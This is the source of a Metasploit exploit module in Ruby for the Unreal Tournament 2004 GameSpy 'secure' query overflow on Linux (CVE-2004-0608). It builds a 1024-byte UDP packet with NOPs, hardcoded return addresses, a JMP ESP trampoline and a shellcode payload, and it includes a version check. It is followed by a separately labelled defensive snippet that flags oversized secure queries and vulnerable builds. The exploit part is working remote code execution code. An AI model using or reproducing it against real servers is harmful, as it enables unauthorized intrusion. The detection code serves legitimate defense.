GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/games/ut2004_secure.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
      'Description'    => %q{
        This is an exploit for the GameSpy secure query in
        the Unreal Engine.

        This exploit only requires one UDP packet, which can
        be both spoofed and sent to a broadcast address.
        Usually, the GameSpy query server listens on port 7787,
        but you can manually specify the port as well.

        The RunServer.sh script will automatically restart the
        server upon a crash, giving us the ability to
        bruteforce the service and exploit it multiple
        times.
      },
      'Author'         => [ 'onetwo' ],
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-0608' ],
          [ 'OSVDB', '7217' ],
          [ 'BID', '10570' ],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 512,
          # backslash is the GameSpy field delimiter and NUL terminates the C string
          'BadChars' => "\x5c\x00",
        },
      'Platform'       => 'linux',
      'Targets'        =>
        [
          ['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], # JMP ESP , (free/realloc) BSS pointer
          ['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
        ],
      'DisclosureDate' => '2004-06-18'))

    register_options(
      [
        Opt::RPORT(7787)
      ])
  end

  def exploit
    connect_udp

    buf = make_nops(1024)
    buf[24, 4] = [target['Rets'][1]].pack('V')
    buf[44, 4] = [target['Rets'][0]].pack('V')
    buf[56, 4] = [target['Rets'][1]].pack('V')
    buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" # LEA/JMP

    buf[0, 8] = "\\secure\\"
    buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded

    udp_sock.put(buf)

    handler
    disconnect_udp
  end

  def ut_version
    connect_udp
    udp_sock.put("\\basic\\")
    # Rex's UDP recvfrom returns [data, host, port]; keep only the data
    data, = udp_sock.recvfrom(8192)
    disconnect_udp

    if (data and (m = data.match(/\\gamever\\([0-9]{1,5})/)))
      return m[1]
    end

    return
  end

  def check
    vers = ut_version

    if (not vers)
      vprint_status("Could not detect Unreal Tournament Server")
      return Exploit::CheckCode::Unknown
    end

    print_status("Detected Unreal Tournament Server Version: #{vers}")
    if (vers =~ /^(3120|3186|3204)$/)
      vprint_status("This system appears to be exploitable")
      return Exploit::CheckCode::Appears
    end

    if (vers =~ /^(2...)$/)
      vprint_status("This system appears to be running UT2003")
      return Exploit::CheckCode::Detected
    end

    vprint_status("This system appears to be patched")
    return Exploit::CheckCode::Safe
  end
end
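A defender-side companion to the two queries the module above uses (the oversized "\secure\" datagram it sends, and the "\basic\" version probe its check() relies on), added here as an example and not part of the Metasploit module. It assumes a benign "\secure\" challenge value is short, so SECURE_VALUE_LIMIT is an illustrative threshold, and the sample datagrams are constructed rather than captured.

```ruby
UT_QUERY_PORT      = 7787                # default GameSpy query port named in the module
SECURE_VALUE_LIMIT = 64                  # assumption: benign challenge values are far shorter
AFFECTED_BUILDS    = %w[3120 3186 3204]  # builds the module's check() reports as exploitable

# Inspect one inbound UDP datagram (destination port, raw payload bytes).
# Returns :ignore, :benign or :suspicious.
def classify_secure_query(dst_port, payload)
  payload = payload.b # treat as raw bytes; the datagram need not be valid UTF-8
  return :ignore unless dst_port == UT_QUERY_PORT
  return :ignore unless payload.start_with?("\\secure\\")

  # GameSpy v1 queries are "\key\value\..." so the value runs up to the
  # next backslash or, as in the module's buffer, to the end of the datagram.
  value = payload[8..-1].split("\\", 2).first.to_s
  value.bytesize > SECURE_VALUE_LIMIT ? :suspicious : :benign
end

# Parse a server's reply to "\basic\" (same regex as the module's ut_version)
# and report whether the advertised build is one the module targets.
# Returns [build_or_nil, affected?].
def assess_basic_reply(reply)
  m = reply.b.match(/\\gamever\\([0-9]{1,5})/)
  return [nil, false] unless m
  [m[1], AFFECTED_BUILDS.include?(m[1])]
end

if __FILE__ == $PROGRAM_NAME
  # constructed sample datagrams (not captured traffic)
  samples = [
    [7787, "\\secure\\ABCDEF"],            # ordinary short challenge
    [7787, "\\secure\\" + "\x90" * 1016],  # oversized, shaped like the module's 1024-byte buffer
    [7777, "\\secure\\ABCDEF"],            # not the query port
    [7787, "\\basic\\"],                   # a version probe, not a secure query
  ]
  samples.each do |port, pl|
    puts "port #{port}, #{pl.bytesize} bytes -> #{classify_secure_query(port, pl)}"
  end
  puts assess_basic_reply("\\gamename\\ut2004\\gamever\\3120\\final\\").inspect
end
```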